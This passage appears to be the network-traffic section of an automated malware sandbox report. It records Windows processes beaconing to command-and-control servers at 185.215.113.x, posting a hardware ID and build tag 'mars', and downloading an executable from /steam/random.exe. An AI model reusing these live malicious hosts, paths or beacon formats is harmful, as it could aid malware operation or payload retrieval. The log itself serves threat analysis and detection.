Nov 10, 2024 04:57:33.093905926 CET	210	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:57:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50274	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:33.224924088 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:34.122315884 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50276	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:35.649635077 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:36.555881023 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50278	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:38.176810026 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:39.078876019 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50280	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:40.594243050 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:41.499690056 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50281	185.215.113.16	80	8104	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:41.711236000 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 10, 2024 04:57:42.620135069 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:42 GMT Content-Type: application/octet-stream Content-Length: 1769472 Last-Modified: Sun, 10 Nov 2024 03:45:33 GMT Connection: keep-alive ETag: "67302c5d-1b0000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 10 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 68 00 00 04 00 00 6d 38 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"h@@hm8@M$a$ $b@.rsrc $r@.idata $r@ )$t@vzzebkzrpNbv@ojovyeswh@.taggant0h"@
Nov 10, 2024 04:57:42.620167971 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:42.620179892 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:42.620189905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:42.620199919 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:42.620212078 CET	236	IN	Data Raw: 41 0f 1c a4 70 6b fa eb 6c 5f 0b e4 ee b7 27 fa 48 bf e1 f3 f0 9e 7d 71 40 79 96 e6 fc 27 34 cf 60 9d 53 27 69 87 5f f0 67 97 bd cc 78 8f ec d7 70 87 74 d4 f6 8f e8 25 19 37 28 2c 60 85 12 0b 79 4b 7b 56 89 43 db 35 90 54 54 04 31 9b 43 a3 2e 1e Data Ascii: Apkl_'H}q@y'4`S'i_gxpt%7(,`yK{VC5TT1C.\#NAwDb_\|3B_]`4Na xm0d?#8\[sn?C7wlIdG K.>%J4-(2Pu']0\r*wh#{Zd
Nov 10, 2024 04:57:42.620220900 CET	1236	IN	Data Raw: 25 88 89 2c 79 c7 19 6a 40 5d 29 c1 89 86 fb 87 83 08 9f 08 90 da 16 eb 43 2b b2 19 ef 72 00 78 fe 01 33 d0 08 91 87 1f 42 ff 68 71 53 a6 50 9f 89 81 10 c6 72 6a 19 18 ff f7 d9 27 5b 76 76 5b ef 93 98 bb 70 8e 97 2a 51 52 49 e4 76 04 98 c5 0e 0f Data Ascii: %,yj@])C+rx3BhqSPrj'[vv[pQRIv?3z/\|P:6Hs#:i=YB90@mj[;q'(+*?f-bq<PrZYGL1k99X,F3ihfQ,~$rxSYD~Yi
Nov 10, 2024 04:57:42.620237112 CET	1236	IN	Data Raw: 0d fe b3 8a 02 9b 6e 26 1d fe e8 29 3b 02 44 19 09 48 6f ba 15 90 69 97 01 0f ec 0e e7 27 6a 25 23 d8 2b 51 d6 ee 07 a3 8e 85 c2 bb a5 c1 14 b8 f2 01 94 0c 6d 88 6e 6c 88 eb d7 81 87 d0 70 ea ec 00 af e4 43 35 93 ab 19 00 2c 59 04 fc 16 9b b8 96 Data Ascii: n&);DHoi'j%#+QmnlpC5,Y{Ss\|pc(^ayH;1QB*J\J(xgNdH72vpj7j\31E6LI+u)6hG=\|rj1VKbhZpR7HQq
Nov 10, 2024 04:57:42.620249987 CET	1236	IN	Data Raw: 53 c3 6b 04 4a 5d 41 9e 79 90 48 36 63 f5 18 e5 d4 88 0c a3 53 43 2b 5c c8 c1 3d 3c 43 83 17 ce fc d3 b0 da ec a4 d1 be 1e 31 5e f7 83 83 b3 24 74 14 23 70 32 c5 fb 56 6e 2b 32 e1 14 60 02 60 78 27 7d d1 ce 47 95 d4 78 8b b1 e5 4b 57 cc a0 e7 c7 Data Ascii: SkJ]AyH6cSC+\=<C1^$t#p2Vn+2``x'}GxKW6?NW{NpsD: kL^C\|ZNu^M:nB\|[Kr`B8#CTY3`>iAkwYo}BCR$_WjSpL/^Z0@45^a8O
Nov 10, 2024 04:57:42.620259047 CET	636	IN	Data Raw: d4 8f 43 4f 4f 95 2b 65 f0 5b 57 94 70 6b 86 e2 38 93 0b d6 77 83 51 db 44 94 7c a5 a9 8c 2e 23 66 85 bb c9 e0 87 d6 20 91 c5 39 f8 40 03 2b e1 1e 93 59 2e eb 6f 25 f9 28 61 87 2b ed 87 41 a1 42 07 3b 51 78 ab 93 38 30 84 87 4c 70 95 d7 f7 f8 60 Data Ascii: COO+e[Wpk8wQD\|.#f 9@+Y.o%(a+AB;Qx80Lp`+"3^wB5BfL8J/LgD+3^3,I;Pk^DXL"acBk.%Qp7S+AJ&Q(cx7`/a,nkY+P*$qI,
Nov 10, 2024 04:57:42.625096083 CET	1236	IN	Data Raw: 69 a5 49 b8 89 91 03 2b bf c5 25 11 38 77 25 fd 04 61 8f a2 43 df 32 a6 ba dd 59 db 38 93 ef d2 4f 06 57 2c 21 07 7c f7 ec 89 25 8c 43 cd 4b a4 18 c3 27 db 19 69 da a7 00 95 3a b9 70 47 94 ac 43 11 fc 16 52 03 9c d6 14 0b b3 cd 30 c1 b3 b8 42 ef Data Ascii: iI+%8w%aC2Y8OW,!\|%CK'i:pGCR0B3e^dB Z_YmgB+ /n$RS$9yr5i}lq'oO(%IbK+ta\C-0LGH07id^nv'sv"&-4s`ptmgL/t2;`w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50282	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:43.141253948 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:44.054430008 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50283	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:45.566220045 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:46.499079943 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50284	185.215.113.206	80	8104	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:47.448323965 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:57:48.348604918 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:57:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:57:48.352202892 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKE Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="build"mars------AFCBAEBAEBFHCAKFCAKE--
Nov 10, 2024 04:57:48.631129980 CET	210	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:57:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50285	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:48.125109911 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:49.028574944 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50286	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:50.558119059 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:51.470607996 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50288	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:53.112246990 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:54.031486988 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50289	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:55.548475027 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:56.457597971 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50290	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:58.080311060 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:59.009175062 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50295	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:00.537898064 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:01.452264071 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50296	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:03.079617977 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:03.987088919 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50297	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:05.503397942 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:06.415415049 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50298	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:08.040956974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
